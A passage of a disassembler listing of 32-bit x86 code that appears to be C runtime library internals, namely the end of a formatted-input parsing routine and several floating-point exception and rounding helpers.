lea edi, [edi+edi*4]
shl edi, 1
jmp short loc_421697
; ---------------------------------------------------------------------------
loc_42165F: ; CODE XREF: sub_420DB0+86E�j
; sub_420DB0+873�j
cmp dword_43D084, 1
jle short loc_421677
push 80h
push ebx
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_421684
; ---------------------------------------------------------------------------
loc_421677: ; CODE XREF: sub_420DB0+8B6�j
mov eax, off_43CE78
mov al, [eax+ebx*2]
and eax, 80h
loc_421684: ; CODE XREF: sub_420DB0+8C5�j
test eax, eax
jz short loc_4216BF
push ebx
shl edi, 4
call sub_4217D5
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_421697: ; CODE XREF: sub_420DB0+8A6�j
; sub_420DB0+8AD�j
inc [ebp+var_1C]
cmp [ebp+var_20], 0
lea edi, [edi+ebx-30h]
jz short loc_4216A9
dec [ebp+var_C]
jz short loc_4216CD
loc_4216A9: ; CODE XREF: sub_420DB0+8F2�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42180C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp loc_42161B
; ---------------------------------------------------------------------------
loc_4216BF: ; CODE XREF: sub_420DB0+897�j
; sub_420DB0+8A1�j ...
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_421826
pop ecx
pop ecx
loc_4216CD: ; CODE XREF: sub_420DB0+865�j
; sub_420DB0+8F7�j
cmp [ebp+var_17], 0
jz short loc_4216D5
neg edi
loc_4216D5: ; CODE XREF: sub_420DB0+843�j
; sub_420DB0+85C�j ...
cmp esi, 46h
jnz short loc_4216DE
and [ebp+var_1C], 0
loc_4216DE: ; CODE XREF: sub_420DB0+928�j
cmp [ebp+var_1C], 0
jz loc_4217B6
cmp [ebp+var_E], 0
jnz short loc_421717
inc [ebp+var_34]
loc_4216F1: ; CODE XREF: sub_420DB0+23B�j
cmp [ebp+var_30], 0
jz short loc_421707
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov ecx, [ebp+var_24]
mov [eax+4], ecx
jmp short loc_421717
; ---------------------------------------------------------------------------
loc_421707: ; CODE XREF: sub_420DB0+945�j
cmp [ebp+var_D], 0
mov eax, [ebp+var_2C]
jz short loc_421714
mov [eax], edi
jmp short loc_421717
; ---------------------------------------------------------------------------
loc_421714: ; CODE XREF: sub_420DB0+95E�j
mov [eax], di
loc_421717: ; CODE XREF: sub_420DB0+241�j
; sub_420DB0+414�j ...
inc [ebp+var_15]
inc [ebp+arg_4]
mov esi, [ebp+arg_4]
jmp short loc_421764
; ---------------------------------------------------------------------------
loc_421722: ; CODE XREF: sub_420DB0+93�j
inc [ebp+var_4]
push edi
call sub_42180C
mov ebx, eax
pop ecx
movzx eax, byte ptr [esi]
inc esi
cmp eax, ebx
mov [ebp+var_14], ebx
mov [ebp+arg_4], esi
jnz short loc_421791
mov ecx, off_43CE78
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_421764
inc [ebp+var_4]
push edi
call sub_42180C
pop ecx
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, eax
mov [ebp+arg_4], esi
jnz short loc_42179F
dec [ebp+var_4]
loc_421764: ; CODE XREF: sub_420DB0+970�j
; sub_420DB0+99A�j
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_42177A
cmp byte ptr [esi], 25h
jnz short loc_4217BC
mov eax, [ebp+arg_4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_4217BC
mov esi, eax
loc_42177A: ; CODE XREF: sub_420DB0+9B8�j
mov al, [esi]
test al, al
jnz loc_420DDA
jmp short loc_4217B6
; ---------------------------------------------------------------------------
loc_421786: ; CODE XREF: sub_420DB0+1F4�j
; sub_420DB0+491�j
push [ebp+arg_0]
dec [ebp+var_4]
push [ebp+var_14]
jmp short loc_421796
; ---------------------------------------------------------------------------
loc_421791: ; CODE XREF: sub_420DB0+98A�j
dec [ebp+var_4]
push edi
push ebx
loc_421796: ; CODE XREF: sub_420DB0+9DF�j
call sub_421826
pop ecx
pop ecx
jmp short loc_4217B6
; ---------------------------------------------------------------------------
loc_42179F: ; CODE XREF: sub_420DB0+9AF�j
dec [ebp+var_4]
push edi
push eax
call sub_421826
dec [ebp+var_4]
push edi
push ebx
call sub_421826
add esp, 10h
loc_4217B6: ; CODE XREF: sub_420DB0+1F�j
; sub_420DB0+40A�j ...
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_4217CD
loc_4217BC: ; CODE XREF: sub_420DB0+9BD�j
; sub_420DB0+9C6�j
mov eax, [ebp+var_34]
test eax, eax
jnz short loc_4217D0
cmp [ebp+var_15], al
jnz short loc_4217D0
or eax, 0FFFFFFFFh
jmp short loc_4217D0
; ---------------------------------------------------------------------------
loc_4217CD: ; CODE XREF: sub_420DB0+A0A�j
mov eax, [ebp+var_34]
loc_4217D0: ; CODE XREF: sub_420DB0+A11�j
; sub_420DB0+A16�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_420DB0 endp
; =============== S U B R O U T I N E =======================================
sub_4217D5 proc near ; CODE XREF: sub_420DB0+7A3�p
; sub_420DB0+8DC�p
arg_0 = dword ptr 4
cmp dword_43D084, 1
push esi
jle short loc_4217EF
mov esi, [esp+4+arg_0]
push 4
push esi
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_4217FE
; ---------------------------------------------------------------------------
loc_4217EF: ; CODE XREF: sub_4217D5+8�j
mov esi, [esp+4+arg_0]
mov eax, off_43CE78
mov al, [eax+esi*2]
and eax, 4
loc_4217FE: ; CODE XREF: sub_4217D5+18�j
test eax, eax
jnz short loc_421808
and esi, 0FFFFFFDFh
sub esi, 7
loc_421808: ; CODE XREF: sub_4217D5+2B�j
mov eax, esi
pop esi
retn
sub_4217D5 endp
; =============== S U B R O U T I N E =======================================
sub_42180C proc near ; CODE XREF: sub_420DB0+1E1�p
; sub_420DB0+289�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
dec dword ptr [edx+4]
js short loc_42181E
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_42181E: ; CODE XREF: sub_42180C+7�j
push edx
call sub_41F8E3
pop ecx
retn
sub_42180C endp
; =============== S U B R O U T I N E =======================================
sub_421826 proc near ; CODE XREF: sub_420DB0+6B�p
; sub_420DB0+3FF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFFFh
jz short locret_42183C
push [esp+arg_4]
push [esp+4+arg_0]
call sub_4247BF
pop ecx
pop ecx
locret_42183C: ; CODE XREF: sub_421826+5�j
retn
sub_421826 endp
; =============== S U B R O U T I N E =======================================
sub_42183D proc near ; CODE XREF: sub_420DB0+63�p
; sub_420DB0+1D3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
loc_421843: ; CODE XREF: sub_42183D+1D�j
push [esp+8+arg_4]
inc dword ptr [esi]
call sub_42180C
mov edi, eax
push edi
call sub_41DF10
pop ecx
test eax, eax
pop ecx
jnz short loc_421843
mov eax, edi
pop edi
pop esi
retn
sub_42183D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __fastcall sub_421861(int,int,double,int)
sub_421861 proc near ; CODE XREF: sub_41D055+51�p
; sub_41D19B+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp dword_43D7F0, 0
jnz short loc_421896
push [ebp+arg_C] ; int
fld qword ptr [ebp+arg_4]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
push ecx ; int
push ecx ; int
fldz
fstp [esp+14h+var_14]
fld qword ptr [ebp+arg_4]
push ecx ; int
push ecx ; int
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_421E16
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_421896: ; CODE XREF: sub_421861+A�j
push 0FFFFh
mov dword_4DBDDC, 21h
push [ebp+arg_C]
call sub_422089
fld qword ptr [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_421861 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4218B4(int,int,double,double,int)
sub_4218B4 proc near ; CODE XREF: sub_41D055:loc_41D118�p
; sub_41D19B:loc_41D25E�p
var_74 = qword ptr -74h
var_6C = qword ptr -6Ch
var_64 = qword ptr -64h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_20 = dword ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_421BFF
add esp, 0Ch
test eax, eax
jnz short loc_4218F2
lea eax, [ebp+arg_10]
and [ebp+var_20], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+arg_18]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_58]
push eax
call sub_42194C
add esp, 18h
loc_4218F2: ; CODE XREF: sub_4218B4+1A�j
push [ebp+arg_0]
call sub_421EE9
cmp dword_43D7F0, 0
pop ecx
jnz short loc_421930
test eax, eax
jz short loc_421930
push [ebp+arg_18] ; int
fld [ebp+arg_10]
push ecx
push ecx ; double
fstp [esp+64h+var_64]
push ecx ; int
push ecx ; int
fldz
fstp [esp+6Ch+var_6C]
fld [ebp+arg_8]
push ecx ; int
push ecx ; int
fstp [esp+74h+var_74]
push [ebp+arg_4] ; int
push eax ; int
call sub_421E16
add esp, 24h
leave
retn
; ---------------------------------------------------------------------------
loc_421930: ; CODE XREF: sub_4218B4+4E�j
; sub_4218B4+52�j
push eax
call sub_421E9E
mov [esp+5Ch+var_5C], 0FFFFh
push [ebp+arg_18]
call sub_422089
fld [ebp+arg_10]
pop ecx
pop ecx
leave
retn
sub_4218B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42194C proc near ; CODE XREF: sub_4218B4+36�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
xor eax, eax
push ebx
push esi
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
push edi
push 1
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
pop ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+arg_8]
test cl, 10h
jz short loc_42197E
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Fh
or [eax+4], ebx
loc_42197E: ; CODE XREF: sub_42194C+23�j
test cl, 2
jz short loc_421991
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000093h
or dword ptr [eax+4], 2
loc_421991: ; CODE XREF: sub_42194C+35�j
test cl, bl
jz short loc_4219A3
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000091h
or dword ptr [eax+4], 4
loc_4219A3: ; CODE XREF: sub_42194C+47�j
test cl, 4
jz short loc_4219B6
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Eh
or dword ptr [eax+4], 8
loc_4219B6: ; CODE XREF: sub_42194C+5A�j
test cl, 8
jz short loc_4219C9
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000090h
or dword ptr [eax+4], 10h
loc_4219C9: ; CODE XREF: sub_42194C+6D�j
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
push 2
mov ecx, [esi]
mov edx, [eax+8]
not ecx
and ecx, ebx
and edx, 0FFFFFFEFh
shl ecx, 4
or ecx, edx
pop edi
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
and ecx, 4
shl ecx, 1
and edx, 0FFFFFFF7h
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 1
and ecx, 4
and edx, 0FFFFFFFBh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 3
and ecx, edi
and edx, 0FFFFFFFDh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 5
and ecx, ebx
and edx, 0FFFFFFFEh
or ecx, edx
mov [eax+8], ecx
call sub_42206C
test al, bl
jz short loc_421A52
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_421A52: ; CODE XREF: sub_42194C+FD�j
test al, 4
jz short loc_421A5D
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_421A5D: ; CODE XREF: sub_42194C+108�j
test al, 8
jz short loc_421A68
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_421A68: ; CODE XREF: sub_42194C+113�j
test al, 10h
jz short loc_421A72
mov ecx, [ebp+arg_0]
or [ecx+0Ch], edi
loc_421A72: ; CODE XREF: sub_42194C+11E�j
test al, 20h
jz short loc_421A7C
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_421A7C: ; CODE XREF: sub_42194C+128�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_421ABB
cmp eax, 400h
jz short loc_421AAD
cmp eax, 800h
jz short loc_421AA1
cmp eax, ecx
jnz short loc_421AC1
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_421AC1
; ---------------------------------------------------------------------------
loc_421AA1: ; CODE XREF: sub_42194C+147�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_421AB7
; ---------------------------------------------------------------------------
loc_421AAD: ; CODE XREF: sub_42194C+140�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_421AB7: ; CODE XREF: sub_42194C+15F�j
mov [eax], ecx
jmp short loc_421AC1
; ---------------------------------------------------------------------------
loc_421ABB: ; CODE XREF: sub_42194C+139�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_421AC1: ; CODE XREF: sub_42194C+14B�j
; sub_42194C+153�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_421AEC
cmp eax, 200h
jz short loc_421ADF
cmp eax, ecx
jnz short loc_421AF9
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_421AF9
; ---------------------------------------------------------------------------
loc_421ADF: ; CODE XREF: sub_42194C+185�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_421AF7
; ---------------------------------------------------------------------------
loc_421AEC: ; CODE XREF: sub_42194C+17E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_421AF7: ; CODE XREF: sub_42194C+19E�j
mov [eax], ecx
loc_421AF9: ; CODE XREF: sub_42194C+189�j
; sub_42194C+191�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
and ecx, 0FFFh
mov edx, [eax]
shl ecx, 5
and edx, 0FFFE001Fh
or ecx, edx
mov [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+50h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+50h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+50h], ecx
mov eax, [ebp+arg_0]
fld qword ptr [edi]
fstp qword ptr [eax+40h]
call sub_42207A
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call ds:dword_427050 ; RaiseException
mov eax, [ebp+arg_0]
test byte ptr [eax+8], 10h
jz short loc_421B73
and dword ptr [esi], 0FFFFFFFEh
loc_421B73: ; CODE XREF: sub_42194C+222�j
test byte ptr [eax+8], 8
jz short loc_421B7C
and dword ptr [esi], 0FFFFFFFBh
loc_421B7C: ; CODE XREF: sub_42194C+22B�j
test byte ptr [eax+8], 4
jz short loc_421B85
and dword ptr [esi], 0FFFFFFF7h
loc_421B85: ; CODE XREF: sub_42194C+234�j
test byte ptr [eax+8], 2
jz short loc_421B8E
and dword ptr [esi], 0FFFFFFEFh
loc_421B8E: ; CODE XREF: sub_42194C+23D�j
test [eax+8], bl
jz short loc_421B96
and dword ptr [esi], 0FFFFFFDFh
loc_421B96: ; CODE XREF: sub_42194C+245�j
mov ecx, [eax]
mov edx, 0FFFFF3FFh
and ecx, 3
sub ecx, 0
jz short loc_421BCA
dec ecx
jz short loc_421BBE
dec ecx
jz short loc_421BB4
dec ecx
jnz short loc_421BCC
or byte ptr [esi+1], 0Ch
jmp short loc_421BCC
; ---------------------------------------------------------------------------
loc_421BB4: ; CODE XREF: sub_42194C+25D�j
mov ecx, [esi]
and ch, 0FBh
or ch, 8
jmp short loc_421BC6
; ---------------------------------------------------------------------------
loc_421BBE: ; CODE XREF: sub_42194C+25A�j
mov ecx, [esi]
and ch, 0F7h
or ch, 4
loc_421BC6: ; CODE XREF: sub_42194C+270�j
mov [esi], ecx
jmp short loc_421BCC
; ---------------------------------------------------------------------------
loc_421BCA: ; CODE XREF: sub_42194C+257�j
and [esi], edx
loc_421BCC: ; CODE XREF: sub_42194C+260�j
; sub_42194C+266�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_421BEC
dec ecx
jz short loc_421BE3
dec ecx
jnz short loc_421BF5
and [esi], edx
jmp short loc_421BF5
; ---------------------------------------------------------------------------
loc_421BE3: ; CODE XREF: sub_42194C+28E�j
mov ecx, [esi]
and ecx, edx
or ch, 2
jmp short loc_421BF3
; ---------------------------------------------------------------------------
loc_421BEC: ; CODE XREF: sub_42194C+28B�j
mov ecx, [esi]
and ecx, edx
or ch, 3
loc_421BF3: ; CODE XREF: sub_42194C+29E�j
mov [esi], ecx
loc_421BF5: ; CODE XREF: sub_42194C+291�j
; sub_42194C+295�j
fld qword ptr [eax+40h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42194C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421BFF proc near ; CODE XREF: sub_4218B4+10�p
var_24 = qword ptr -24h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push edi
mov edi, eax
and edi, 1Fh
push 1
test al, 8
pop ebx
jz short loc_421C2A
test byte ptr [ebp+arg_8], bl
jz short loc_421C2A
push ebx
call sub_4220AC
pop ecx
and edi, 0FFFFFFF7h
jmp loc_421DF4
; ---------------------------------------------------------------------------
loc_421C2A: ; CODE XREF: sub_421BFF+15�j
; sub_421BFF+1A�j
test al, 4
jz short loc_421C44
test byte ptr [ebp+arg_8], 4
jz short loc_421C44
push 4
call sub_4220AC
pop ecx
and edi, 0FFFFFFFBh
jmp loc_421DF4
; ---------------------------------------------------------------------------
loc_421C44: ; CODE XREF: sub_421BFF+2D�j
; sub_421BFF+33�j
test al, bl
jz loc_421D1E
test byte ptr [ebp+arg_8], 8
jz loc_421D1E
push 8
call sub_4220AC
pop ecx
mov eax, 0C00h
mov ecx, [ebp+arg_8]
and ecx, eax
jz loc_421CF6
cmp ecx, 400h
jz short loc_421CCE
cmp ecx, 800h
jz short loc_421CA6
cmp ecx, eax
jnz loc_421D16
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_427860
fld dbl_43D3F0
fnstsw ax
sahf
ja short loc_421C9E
fchs
loc_421C9E: ; CODE XREF: sub_421BFF+9B�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_421D14
; ---------------------------------------------------------------------------
loc_421CA6: ; CODE XREF: sub_421BFF+7D�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_427860
fnstsw ax
sahf
jbe short loc_421CBE
fld dbl_43D3E0
jmp short loc_421CC6
; ---------------------------------------------------------------------------
loc_421CBE: ; CODE XREF: sub_421BFF+B5�j
fld dbl_43D3F0
fchs
loc_421CC6: ; CODE XREF: sub_421BFF+BD�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_421D14
; ---------------------------------------------------------------------------
loc_421CCE: ; CODE XREF: sub_421BFF+75�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_427860
fnstsw ax
sahf
jbe short loc_421CE6
fld dbl_43D3F0
jmp short loc_421CEE
; ---------------------------------------------------------------------------
loc_421CE6: ; CODE XREF: sub_421BFF+DD�j
fld dbl_43D3E0
fchs
loc_421CEE: ; CODE XREF: sub_421BFF+E5�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_421D14
; ---------------------------------------------------------------------------
loc_421CF6: ; CODE XREF: sub_421BFF+69�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp ds:dbl_427860
fld dbl_43D3E0
fnstsw ax
sahf
ja short loc_421D0E
fchs
loc_421D0E: ; CODE XREF: sub_421BFF+10B�j
fstp [ebp+var_C]
fld [ebp+var_C]
loc_421D14: ; CODE XREF: sub_421BFF+A5�j
; sub_421BFF+CD�j ...
fstp qword ptr [ecx]
loc_421D16: ; CODE XREF: sub_421BFF+81�j
and edi, 0FFFFFFFEh
jmp loc_421DF4
; ---------------------------------------------------------------------------
loc_421D1E: ; CODE XREF: sub_421BFF+47�j
; sub_421BFF+51�j
test al, 2
jz loc_421DF4
test byte ptr [ebp+arg_8], 10h
jz loc_421DF4
push esi
xor esi, esi
test al, 10h
jz short loc_421D39
mov esi, ebx
loc_421D39: ; CODE XREF: sub_421BFF+136�j
mov eax, [ebp+arg_4]
fld qword ptr [eax]
fstp [ebp+var_C]
fld [ebp+var_C]
fcomp ds:dbl_427860
fnstsw ax
sahf
jz loc_421DE2
fld [ebp+var_C]
lea eax, [ebp+var_4]
push eax ; int
push ecx
push ecx ; double
fstp [esp+24h+var_24]
call sub_421FAB
mov eax, [ebp+var_4]
add esp, 0Ch
fstp [ebp+var_C]
lea ecx, [eax-600h]
cmp ecx, 0FFFFFBCEh
jge short loc_421D84
fldz
mov esi, ebx
fstp [ebp+var_C]
jmp short loc_421DD8
; ---------------------------------------------------------------------------
loc_421D84: ; CODE XREF: sub_421BFF+17A�j
fld [ebp+var_C]
fcomp ds:dbl_427860
fnstsw ax
sahf
jnb short loc_421D96
mov edx, ebx
jmp short loc_421D98
; ---------------------------------------------------------------------------
loc_421D96: ; CODE XREF: sub_421BFF+191�j
xor edx, edx
loc_421D98: ; CODE XREF: sub_421BFF+195�j
mov al, byte ptr [ebp+var_C+6]
and eax, 0Fh
or al, 10h
mov word ptr [ebp+var_C+6], ax
mov eax, 0FFFFFC03h
cmp ecx, eax
jge short loc_421DCC
sub eax, ecx
loc_421DAF: ; CODE XREF: sub_421BFF+1CB�j
test byte ptr [ebp+var_C], bl
jz short loc_421DBA
test esi, esi
jnz short loc_421DBA
mov esi, ebx
loc_421DBA: ; CODE XREF: sub_421BFF+1B3�j
; sub_421BFF+1B7�j
shr dword ptr [ebp+var_C], 1
test byte ptr [ebp+var_C+4], bl
jz short loc_421DC6
or byte ptr [ebp+var_C+3], 80h
loc_421DC6: ; CODE XREF: sub_421BFF+1C1�j
shr dword ptr [ebp+var_C+4], 1
dec eax
jnz short loc_421DAF
loc_421DCC: ; CODE XREF: sub_421BFF+1AC�j
test edx, edx
jz short loc_421DD8
fld [ebp+var_C]
fchs
fstp [ebp+var_C]
loc_421DD8: ; CODE XREF: sub_421BFF+183�j
; sub_421BFF+1CF�j
fld [ebp+var_C]
mov eax, [ebp+arg_4]
fstp qword ptr [eax]
jmp short loc_421DE4
; ---------------------------------------------------------------------------
loc_421DE2: ; CODE XREF: sub_421BFF+14E�j
mov esi, ebx
loc_421DE4: ; CODE XREF: sub_421BFF+1E1�j
test esi, esi
pop esi
jz short loc_421DF1
push 10h
call sub_4220AC
pop ecx
loc_421DF1: ; CODE XREF: sub_421BFF+1E8�j
and edi, 0FFFFFFFDh
loc_421DF4: ; CODE XREF: sub_421BFF+26�j
; sub_421BFF+40�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_421E0B
test byte ptr [ebp+arg_8], 20h
jz short loc_421E0B
push 20h
call sub_4220AC
pop ecx
and edi, 0FFFFFFEFh
loc_421E0B: ; CODE XREF: sub_421BFF+1F9�j
; sub_421BFF+1FF�j
xor eax, eax
test edi, edi
pop edi
pop ebx
setz al
leave
retn
sub_421BFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_421E16(int,int,int,int,int,int,double,int)
sub_421E16 proc near ; CODE XREF: sub_421861+2B�p
; sub_4218B4+72�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
push [ebp+arg_4]
call sub_421EC4
test eax, eax
pop ecx
mov [ebp+var_1C], eax
jz short loc_421E81
mov eax, [ebp+arg_8]
push esi
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov esi, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
mov dword ptr [ebp+var_8+4], eax
call sub_422089
lea eax, [ebp+var_20]
push eax
call sub_42482D
add esp, 0Ch
test eax, eax
jnz short loc_421E7B
push esi
call sub_421E9E
pop ecx
loc_421E7B: ; CODE XREF: sub_421E16+5C�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_421E81: ; CODE XREF: sub_421E16+14�j
push 0FFFFh
push [ebp+arg_20]
call sub_422089
push [ebp+arg_0]
call sub_421E9E
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_421E16 endp
; =============== S U B R O U T I N E =======================================
sub_421E9E proc near ; CODE XREF: sub_4218B4+7D�p
; sub_421E16+5F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_421EB9
jle short locret_421EC3
cmp eax, 3
jg short locret_421EC3
mov dword_4DBDDC, 22h
retn
; ---------------------------------------------------------------------------
loc_421EB9: ; CODE XREF: sub_421E9E+7�j
mov dword_4DBDDC, 21h
locret_421EC3: ; CODE XREF: sub_421E9E+9�j
; sub_421E9E+E�j
retn
sub_421E9E endp
; =============== S U B R O U T I N E =======================================
sub_421EC4 proc near ; CODE XREF: sub_421E16+9�p
arg_0 = dword ptr 4
xor ecx, ecx
mov eax, offset dword_43D308
loc_421ECB: ; CODE XREF: sub_421EC4+18�j
mov edx, [eax]
cmp edx, [esp+arg_0]
jz short loc_421EE1
add eax, 8
inc ecx
cmp eax, offset dbl_43D3E0
jl short loc_421ECB
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_421EE1: ; CODE XREF: sub_421EC4+D�j
mov eax, off_43D30C[ecx*8]
retn
sub_421EC4 endp
; =============== S U B R O U T I N E =======================================
sub_421EE9 proc near ; CODE XREF: sub_4218B4+41�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_421EF5
push 5
jmp short loc_421F0B
; ---------------------------------------------------------------------------
loc_421EF5: ; CODE XREF: sub_421EE9+6�j
test al, 8
jz short loc_421EFD
push 1
jmp short loc_421F0B
; ---------------------------------------------------------------------------
loc_421EFD: ; CODE XREF: sub_421EE9+E�j
test al, 4
jz short loc_421F05
push 2
jmp short loc_421F0B
; ---------------------------------------------------------------------------
loc_421F05: ; CODE XREF: sub_421EE9+16�j
test al, 1
jz short loc_421F0D
push 3
loc_421F0B: ; CODE XREF: sub_421EE9+A�j
; sub_421EE9+12�j ...
pop eax
retn
; ---------------------------------------------------------------------------
loc_421F0D: ; CODE XREF: sub_421EE9+1E�j
movzx eax, al
and eax, 2
shl eax, 1
retn
sub_421EE9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_421F16(double)
sub_421F16 proc near ; CODE XREF: sub_41D055:loc_41D0DB�p
; sub_41D19B:loc_41D221�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
frndint
fstp [ebp+var_8]
fld [ebp+var_8]
leave
retn
sub_421F16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
